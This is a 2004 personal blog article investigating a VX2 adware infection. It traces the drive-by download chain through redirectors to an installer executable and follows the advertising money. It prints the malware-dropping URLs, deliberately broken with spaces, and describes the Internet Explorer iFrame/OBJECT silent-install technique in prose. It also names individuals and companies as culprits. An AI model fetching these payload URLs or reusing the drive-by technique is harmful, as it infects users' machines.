I first published this article in my online journal on November 7, 2004. It details an infection of a Windows 2000 system belonging to my girlfriend with a particularly odius piece of malware called VX2, software which serves up ads on an infected computer and which goes to extraordinary lengths to prevent itself from being removed. The article traces the avenue of infection, the people responsible for the infection, and the people who profit from the distribution of malicious software like this. |
The amount of email I receive from this page has surged now that a man named Dale Begg-Smith, formerly a Canadian and a new Australian citizen, recently won a gold medal in skiing for the Australian Olympic team.| If you're reading this post and you're on a Windows computer, the odds are overwhelming--between 80% and 90%--that you are infected with at least one virus or spyware program, and the odds are very high that you're infected with dozens or hundreds.
Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.
There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I've always had, though, is who's making all this money by infecting your computer? A couple nights ago, Shelly's computer became infected. Shelly's technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer, and she still became infected nonetheless. I spent about six hours removing the infection, and also tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting. If you don't care about stuff like this, you can skip the rest of this message. If you're curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they're so common, how they spread, and most important, who makes money by creating and releasing them, read on! Shelly's computer started behaving strangely, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer, late Wednesday afternoon. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today's VX2 is extremely sophisticated, highly destructive, and almost impossible to remove. Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it. VX2 remains memory-resident, even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer's Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well. Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly's computer was infected with what it described as "VX2 Variant 3," but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware. But from where? Now things get interesting. In following the source of the infection, I ended up in a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware. Shelly's computer first became infected when her browser visited the Web address "http://69.20.56.3/ normal/yyy12.html". At the time I am writing this, this Web address is still active.
I don't know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad. The site infects a computer using an Explorer iFrame exploit. Put most simply, if a Web page contains an iFrame that points to another Web page containing an OBJECT tag, the file referenced in the OBJECT tag (in this case, a dropper for VX2) is downloaded and installed silently, without the user's knowledge or consent. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.
The Web site at 69.20.56.3 is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service. So Rackspace is the first company profiting from the infection; they're making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we'll be seeing it again later. So. Moving along: The virus-dropping Web site at 69.20.56.3 is nothing but a simple redirector. It redirects to "http://213.159.98.203/ ads/banners/banner3.php?ID=1". Again, I have put a space in this URL.
This page is referenced by an iFrame from the preceding page, and contains an iFrame pointing to the next server in the chain, which contains the actual dropper; we'll get to that in a moment. This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don't know if they're a knowing participant or just an innocent ISP who's unknowingly hosting a virus dropper.
Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we've already gone through two redirectors in two countries. The Russian Web site contains an Internet Explorer iFrame exploit which causes Internet Explorer to load a program from the URL "http://www.xzoomy.com/ stc.php?stid=007". Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you'll be infected with VX2.
Now we're getting somewhere. The xzoomy.com Web site is a search engine that's well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitor through the use of spyware, adware, and viruses. They've been responsible for their own spyware/adware software, and they've got their hands in an Internet gambling site called "free scratch and win" as well. These guys are looking more and more like our scumbags, eh? This site is registered to: So Mike Cass is up to his ears in this mess. Mike's Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here--Peer 1 by hosting Mike's Web site in spite of the fact that it's known to be associated with adware and spyware, Mike because he makes money every time someone visits his site.XzoomY.COM But wait, there's more! The xzoomyy.com Web site is another redirector. It redirects to "http://www.2nd-thought.com/ files/install007.exe" (I've put a space in the URL); and it loads and executes the Windows program install007.exe from the 2nd-thought.com Web site by using an OBJECT tag. This file, install007.exe, is the actual executable that installs the adware. If you're using Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you, because the OBJECT tag that references it is contained inside an iFrame. This is also why other browsers are safer; they don't recognize the iFrame tag. The program install007.exe loads and runs as soon as the browser hits that page; the computer's owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim's computer. Note that all this--the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus--all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer. 2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims' computers without permission or notification. Let's take a look-see and find out who these guys are: Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?Domain name: 2nd-thought.com
2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That's two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly's computer. So now we know how VX2 ended up on Shelly's computer. We know what people are responsible, we know what businesses support and profit from them, and we know they've gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people's computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they're both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of. What's left is discovering the why. What's the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go? For that, I had to turn to the actions that this VX2 variant takes once it's infected the computer, and to the ads it serves up. This particular strain of VX2 does two things. First, it carries a payload unusual for adware; it loads another adware program called Bargain Buddy. Bargain Buddy's Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom. The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them "the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants" (and so on, and so on). CashBackBuddy and its scumware is operated by an outfit called eXact Advertising: eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called "luvbandit," and so on.eXact Advertising
The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim's computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy "referrers;" the rest is profit. So what that means is that if I sign up with eXact Advertising, then I get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money. eXact Advertising claims to be "opt-in;" they say the only way you'll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they're doing businesses with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don't care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent. So. Now Shelly's computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own. Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that's written its own custom adware. Some of them are from VX2 itself. It's the latter ones, the ones that VX2 is generating, that are the most interesting. VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware. The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates. I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly's computer belonged to an outfit calling itself "look2me.com". Look2me.com is--surprise surprise--a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com. Look2me.com is hosted by... Look2me.com is owned by: NicTech Networks also owns a dating service called "SimilarSingles.com". Sound familiar?NicTech Networks eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace. Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware. It's hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I've emailed the responsible hosts. After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer1 has taken any action against the Web sites named in this report. So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing. But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means, somebody is clicking on these popup ads and buying the advertisers products. But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth? Ah, that's the pure genius of it--that's the brilliance of the scheme, honed to a fine edge. The popup ads you get when you're infected with VX2? They advertise... ...spyware removal and popup blocking tools. ADDITIONAL BACKGROUND INFORMATION ABOUT VX2 I recently received an email from an individual, who's asked not to be identified, who says he used to work with the people responsible for the creation of VX2. I've received permission to reproduce the contents of that email, minus personally identifying information; the contents of the email are below.
...can be a nightmare. There are several variants of VX2; each is more sophisticated than the last at preventing itself from being removed. Almost all VX2 variants hide themselves by patching the Task Manager, so their processes do not show up when you bring up the Task Manager; some of the later versions also conceal themselves from Windows Explorer, so you can not see the viral files on your hard drive even if you know where they are and what they're named. One thing all VX2 variants have in common is that they are virtually impossible to stop on an infected machine. VX2 loads even when a Windows computer is booted in "safe mode." It's characterized by having multiple processes which watchdog each other and the system Registry; if one VX2 process is terminated, it's re-started by the other, and if the Registry is modified to remove calls to VX2 while VX2 is running, it immediately rewrites the Registry to add itself back. VX2 is also polymorphic, in the sense that its executable files may be renamed each time the computer is restarted or shut down. The earliest VX2 variant can be removed by LavaSoft's Ad-Aware, which is available at download.com. VX2 variants 2 and 3 can not be removed by Ad-Aware alone, but can often be removed by the Ad-Aware VX2 Plugin. (Be sure to follow the instructions precisely when using this plugin!) Later variants can not be removed even by this plugin. I've not had any success removing any variant of VX2 using Spybot Search & Destroy. I'm told that Microsoft's anti-spyware application can remove some variants of VX2, though I have not tried it myself.
Removing VX2 in cases where applications such as Ad-Aware have failed requires either access to another computer, or access to a bootable floppy disk. You can create a bootable floppy using Windows; the process is different for different versions of Windows, and is explained in Windows Help. If you have access to either a bootable floppy or to a second computer, the process goes like this:
I've also received an email from at least one person who's had success against some VX2 variants by using the following method, which may be worth a first shot at dealing with a VX2 infection:
Anyone with additional information on VX2 may reach me by email. If you have comments or questions, please feel free to email me or to reply in the LiveJournal entry regarding VX2. [Update]: If you are infected with VX2, I am especially interested in a sampling of the URLs it is serving up ads from. You probably will not be able to see the URL in a popup ad, but you should be able to see the URL in the Internet Explorer history. The URLs are probably very long. I believe that VX2 pulls ads from respected, big-name, mainstream Web advertising companies, who turn a blind eye to people using illegal techniques or software to present ads. I am particularly interested to know whether or not the new VX2 variants still pull ads from Revenue.com. |
|
Home | About | Gallery | BDSM? | Polyamory? | Essays | Billboards | Resources
Transhumanism | Fun Stuff | Shareware | Grammar | Spam and Slime | Xero | Email |